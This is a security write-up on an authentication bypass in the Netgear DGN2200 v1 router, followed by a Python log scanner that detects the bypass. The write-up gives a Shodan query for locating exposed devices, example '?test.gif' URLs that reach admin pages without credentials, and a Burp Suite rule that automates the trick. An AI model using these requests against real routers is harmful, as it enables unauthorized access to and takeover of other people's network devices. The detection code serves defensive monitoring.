Authentication Bypass - Netgear DGN2200 N300 Wireless ADSL2+ Modem Router

Introduction

An authentication bypass vulnerability exists in the Netgear DGN2200 N300 Wireless ADSL2+ Modem Router, version v1.

Device Identification

Identify vulnerable devices from the results of the following Shodan search query:

netgear dgn2200


Authentication Bypass

The router's web pages can be viewed without any credentials by appending ?test.gif to every URL, as shown below.

http://deviceIP:port/RST_status.htm?test.gif

http://deviceIP:port/BAS_pppoa.htm?test.gif

http://deviceIP:port/WAN_wan.htm?test.gif


Automation Using Burp Suite Proxy Match and Replace

In the Burp Suite Proxy > Options tab, add a Match and Replace rule to replace " HTTP/1.1" with "?test.gif HTTP/1.1".

From now on, every request sent from the browser will automatically have ?test.gif appended.
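
On the defensive side, the ?test.gif suffix is easy to spot in HTTP logs. The following added example (not from the original post) flags requests whose path is a page but whose query string ends in a bare static-asset filename, which generalises beyond test.gif. It assumes Common Log Format lines from a proxy or sensor in front of the router's web interface; the log lines, extension lists and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumption: these extension lists are illustrative; only .htm pages and
# the ?test.gif suffix come from the post.
PAGE_EXT = (".htm", ".html", ".cgi", ".asp")
# A bare token (no '=') ending the query string that looks like a static asset.
ASSET_RE = re.compile(r"(?:^|[?&])([^=&?]+\.(?:gif|jpe?g|png|css|js|ico))$", re.I)
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d(?:\.\d)?"')

# Constructed sample log lines (documentation IP ranges, made-up sizes).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2021:10:00:00 +0000] "GET /RST_status.htm?test.gif HTTP/1.1" 200 5120',
    '192.0.2.10 - - [01/Jan/2021:10:00:02 +0000] "GET /BAS_pppoa.htm?test.gif HTTP/1.1" 200 4096',
    '198.51.100.7 - admin [01/Jan/2021:10:01:00 +0000] "GET /WAN_wan.htm HTTP/1.1" 200 3000',
    '198.51.100.7 - admin [01/Jan/2021:10:01:01 +0000] "GET /images/logo.gif HTTP/1.1" 200 800',
    '198.51.100.7 - admin [01/Jan/2021:10:01:05 +0000] "GET /setup.cgi?next_file=logo.gif HTTP/1.1" 200 100',
    '192.0.2.10 - - [01/Jan/2021:10:02:00 +0000] "POST /setup.cgi?id=1?test.gif HTTP/1.1" 200 10',
]


def suspicious_suffix(target):
    """Return the bare asset-like token ending the query string, or None."""
    parts = urlsplit(target)
    # Real image requests have an asset path; only page paths are of interest.
    if not parts.path.lower().endswith(PAGE_EXT):
        return None
    match = ASSET_RE.search(parts.query)
    return match.group(1) if match else None


def scan(lines):
    """Return (client, target, token) for each flagged access-log line."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue  # not an HTTP request line
        token = suspicious_suffix(m.group("target"))
        if token:
            hits.append((line.split()[0], m.group("target"), token))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A legitimate parameter value such as next_file=logo.gif is not flagged, while a suffix tacked onto an existing query string (id=1?test.gif), as a blanket rewrite rule would produce, is.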